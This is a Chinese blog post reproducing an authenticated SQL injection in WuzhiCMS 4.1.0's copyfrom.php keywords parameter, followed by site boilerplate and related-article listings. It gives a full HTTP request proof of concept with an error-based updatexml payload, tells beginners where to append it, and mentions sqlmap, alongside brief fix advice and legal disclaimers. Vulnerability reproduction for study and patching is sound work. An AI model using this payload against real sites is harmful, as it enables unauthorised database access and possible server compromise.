【漏洞复现】五指CMS copyfrom.php SQL注入漏洞复现

已于 2024-01-31 15:11:08 修改
阅读量1k 收藏 7
点赞数 26
分类专栏: 漏洞复现 文章标签: web安全 安全 网络安全
于 2024-01-31 15:05:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KKleeeaa/article/details/135953960
版权

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01 产品简介

WUZHI CMS是北京五指互联科技有限公司的一套基于PHP和MySQL的开源内容管理系统,响应式布局,一个网站兼容多个终端 × 微信接口全支持,快速构建微营销平台 × 开放接口,支持第三方APP无缝接入。

0x02 漏洞概述

五指CMS的/core/admin/copyfrom.php $keywords参数存在SQL注入漏洞,经过身份验证的攻击者可通过该漏洞获取数据库中的信息之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

Wuzhicms <= v4.1.0

0x04 复现环境搭建

phpstudy集成环境

Nginx(1.15.11) + MySQL(5.7.26) + php(7.2.4nts)WuZhiCMS V4.1.0

安装包:https://github.com/wangshunde/wuzhicms                                               

 打不开开加速器,作者是开的游戏加速器加速Github站

访问以下路径进行安装,并且提前搭建好数据库。

http://{ip/host}/www/install/index.php

图片

0x05漏洞复现

需要进行登录认证

图片

漏洞URL路径

/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms

图片

漏洞POC

GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1'+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+ HTTP/1.1
Host: 192.168.5.146
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.5.146/www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=8e1iv8mhg3peefbamikj5hgg9g; oAf_siteid=2b92gtq6hC8N7wWn7RPdtdsUSWN12n21gtiXENTt
Connection: close


对于初学者来说Poc是什么,poc就是概念验证,就是验证是否存在的东西。你们搜索抓包过后 在第一行的末尾加上

'+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+

图片

SQLmap补充验证

文本是Get包

图片

图片

0x06 漏洞修复

官方暂时未发布最新补丁,请注意官网最新消息。

或者添加Waf,以及关键字过滤。

https://www.wuzhicms.com/

小编提示:未经授权的渗透测试属于违法行为!!!!

图片

Aniya也会哭
关注
  • 26
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
五指CMS copyfrom.php SQL注入漏洞复现(CVE-2023-52064)
0xSec
01-16 608
Wuzhicms 内容管理系统的/core/admin/copyfrom.php $keywords参数存在SQL注入漏洞,经过身份验证的攻击者可通过该漏洞获取数据库中的信息之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
五指cms一套代码部署多个网站
蹦哒哒的王小哲
09-22 756
简述:最近在做一些企业站,因为有很多个网站,如果没个网站都搭建一套程序,未免有点太过浪费资源,如何用一套后台框架来实现多个网站的部署呢?每个网站都有独立数据库,具体如何实现呢?
wuzhicms五指cms
12-19
本插件系针对五指cms开发的短信插件,插件内的所有文件均为对原文件的修改,如果你的系统经过二次开发,安装本插件之前,请仔细核对修改。
【代码审计】五指CMS_v4.1.0 后台存在SQL注入漏洞分析
12-03 2503
  0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhicms.com/download/ 测试网站首页:   0x01 代码分析 1、漏洞文件位置:/coreframe/app/promote/admin/index.php 第...
【代码审计】五指CMS_v4.1.0 copyfrom.php 页面存在SQL注入漏洞分析
12-03 1174
  0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhicms.com/download/ 测试网站首页:   0x01 代码分析 1、漏洞文件位置:/coreframe/app/core/admin/copyfrom.php  ...
五指CMS
chijulv3077的博客
12-01 258
5月份用了一下,那时候代码还不是很完善 中间停用了,更新了2个版本,貌似不错 12月现在重新捡回来,以前的小问题貌似都修复了,给个赞 性能方面也还暂时没用到,之后在说 5指CMS的几个特性是我必须用的 生成静态页面 模板切换 安装页面 *缺 模板管理(缺...
五指cms标签说明汇总
weixin_30247159的博客
05-12 357
1、栏目列表标签 只有一级导航: {wz:content action="category" cid="0" pagesize="100" order="sort ASC"} <li><a href="{WEBURL}">首页</a></li> {loop $rs $r} {if $r['ismenu']}<li {if $...
CMS漏洞复现
qq_43613144的博客
07-20 6305
漏洞复现-啧啧啧
基于PHP五指cms utf-8.zip
08-28
【标题】"基于PHP五指CMS UTF-8"是一个以PHP编程语言开发的网站内容管理系统,主要特点是采用UTF-8编码,支持多语言环境,适用于构建各类网站。UTF-8编码是目前互联网上最广泛使用的字符编码,能兼容世界上大部分...
五指cms短信插件说明.doc
12-01
五指CMS短信插件说明】 五指CMS短信插件是一款专为五指CMS V4.1.0设计的扩展工具,由互亿无线公司开发,旨在增强网站的用户体验和服务质量。这款插件的主要功能包括手机号短信验证注册、预约信息管理和获取优惠券...
五指cms网站管理系统 v4.1.0 正式版
10-23
五指cms网站管理系统前后台界面采用html5+css3技术,可以进行跨屏、跨设备管理内容,极大的提升了用户体验。软件由原phpcms V9  负责人王参加主导开发。五指CMS主要包含以下功能点:一、站群:3.0全面支持站群管理,各子站可建立自己的栏目,自行对栏目信息进行编辑与维护,以及信息的推送;主站则充分发挥信息集成的优势,做到信息资源的最大利用与共享,提高管理效率降低维护成本。1、数据报送功能,子站数据添加的同时报送信息到主站;2、单点登录功能,用户统一管理,统一验证;3、支持文章、图片、下载、以及自定义各种内容模型;4、支持内容的多级审核;  5、模块化构架,方便新功能、新模块的扩展;6、支持全静态生成整个站点,提高页面访问速度,减轻数据库的压力;7、支持www目录与核心代码分离部署,提高系统的安全性;8、前台页面适配各种移动设备,支持跨屏浏览访问;9、支持前台列表页与内容页访问的权限控制,增强信息的安全性。10、支持在线投稿,投稿多级审核。二、用户管理功能升级1、支持整合ucenter、整合第三方(QQ、微博、微信)登录。2、多角色多权限,一个管理员可以身兼多职,一个会员可以
五指CMS自学视频-第1集:系统安装
04-16
五指CMS自学视频第1集:系统安装,2018年4月16日 18:29:42录制
五指cms网站系统最新官方版
04-04
五指cms由原phpcms V9 负责人王参加主导开发,前后台界面采用html5+css3技术,可以进行跨屏、跨设备管理内容,极大的提升了用户体验。五指CMS主要包含以下功能点: 一、模型化设计: 1、全站统一模型,方便二次开发; 2、独创共享模型,独立模型,大小数据全部按需存储; 3、支持10多种不同类型的字段添加:如,文本字段,超级字段,地图字段,滑动条字段,组图字段,下载字段,URL加密字段等。 二、数据读写分离: 1、默认支持数据读写分离; 2、支持1台主数据,多台从数据库; 3、支持按照权重分配数据资源。 三、安全性设计: 1、支持缓存文件目录独立设置; 2、支持www目录与核心代码分离部署; 3、支持cookie加密存储; 4、支持后台程序文件与前台文件分离; 5、支持全局Mysql注入过滤; 6、支持上传目录自定义,禁用php执行; 7、后台登录采用session+session验证码,记录所有登录历史; 8、后台管理日志记录; 9、是否允许修改模版需要有服务器文件管理权限; 10、所有菜单都需要进行权限验证; 四、性能设计: 1、缓存支持内存缓存,如:memcache 缓存; 2、不重复生成和检查模版缓存,提升性能; 五、移动优先设计: 1、默认支持移动端访问自适应; 2、无需重复发文章,文章一键推送。 五指cms v1.4 更新日志: 新增内容手动分页 新增百度地图 新增订单管理模块 新增订单地址管理 增加Microsoft YaHei字体 新增推广邀请模块 新增私密下载,下载函数 详细说明:http://php.662p.com/thread-583-1-1.html
五指CMS 4.1.0 UTF-8.zip
05-25
五指CMS是一款高性能的内容管理系统,是大型门户、媒体网站、企业网站建站首选网站管理系统。五指CMS 4.1.0 UTF-8 更新日志:2017-08-31* 优化:安装时的报错显示提示;* 修复:批量更新内容页链接,当栏目有外链的时候更新失败;* 新增:批量删除附件;* 新增:内容模块:回收站内容可以批量删除;* 新增:后台模版自定义-不影响升级;* 新增:图片裁剪功能;* 新增:文件备份所在目录;* 新增:HTTP_SSL 常量,得到的结果为:http或者https;* 修复:版权信息 全站开启https版权信息后,版权信息无法显示bug;* 优化:一些notice错误;* 优化:strcut函数,notice 错误;* 优化:附件配置丢失,错误显示;* 新增:附件通过编辑器进行,上传md5 校验,不重复上传图片;* 优化:当用户调用 mysql类时,不支持时提示函数不存在;* 修复:组图选择已上传的文件,返回地址错误;* 新增sitemap批量定时更新。php /coreframe/crontab.php sitemap create;* 优化:删除多余的代码;* 新增:全站搜索,通过计划任务,自动更新到全站搜索表;* 修复:视频内容页模版缺少描述内容展示;* 修复:视频列表页面:观看数量显示错误;* 删除多余的代码;* 优化:手机登录页面;* 修复:排行榜标签,数量无法显示;* 修改:默认cookie 作用路径为 根目录;* 修复:会员字段sys_name 字段缺少;* 修复:xss 安全过滤;* 修复:组图排序拖拽;* 修复:附件上传为非图片格式,无法返回bug;* 优化:附件浏览服务器和网络地址仅仅允许后台用户使用;* 修复:最新的flash 下面 头像上传无法显示;* 修复:下载漏洞,可下载任意文件;* 新增:mysql类可以多次初始化,并传递不同的mysql配置;* 修复:登录无法调整到之前页面;* 优化:模版中删除多余调试代码;* 新增:内容页关键词链接。
PHP实例开发源码-五指cms utf-8.zip
11-22
PHP实例开发源码-五指cms utf-8.zip】是一个包含了PHP编程语言实现的五指内容管理系统(CMS)的源代码,适用于学习和参考。这个压缩包主要针对那些想要了解或深入研究PHP CMS开发的开发者,特别是对于UTF-8编码...
基于PHP五指cms 网站管理系统 php版.zip
最新发布
08-28
【标题】"基于PHP五指cms 网站管理系统 php版.zip" 指的是一款使用PHP语言开发的网站内容管理系统(CMS),名为“五指cms”。此系统旨在为用户提供便捷、高效的网站构建和管理工具,特别是对于那些对编程不熟悉的...
五指CMS内容的添加与维护
weixin_33716941的博客
03-07 353
五指CMS内容的添加与维护:1、标题可以设置颜色;2、信息可以推送到自定义的页面区块中;3、采用了百度的文本编辑器,图片可以直接复制到编辑框中添加;4、相关内容通过关键词检索添加;5、可以设置文章访问权限;6、文章在前台显示的顺序可以通过权重滑动条来调整;7、设置文章是否可以评论。 转载于:https://blog.51cto.com/wuzhicms/190408...
php mcv,模块开发_二次开发_五指CMS网站管理系统(wuzhicms)-门户网站、B2b企业黄页、企业网站、手机建站、手机网站、微信接入...
weixin_33085941的博客
03-10 353
模块开发首先,模块开发需要了解五指cms的目录结构:然后,我们需要新增加一个模块目录:再app下面创建如:content下面包含文件:前台文件的创建:看下 index.php 的内容:...
从Wordpress转五指CMS
大话程序员
07-30 1172
这个wordpress启动说明,值得推荐 http://www.solagirl.net/how-wordpress-boots-up.html 引用块内容 没办法, wordpress始终是10年前,15年前的产物,响应太慢了,放弃了所以改行专攻这个五指cms 响应 二次开发 安全性 运营 开源平台 http://www.wuzhicms.com/doc/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值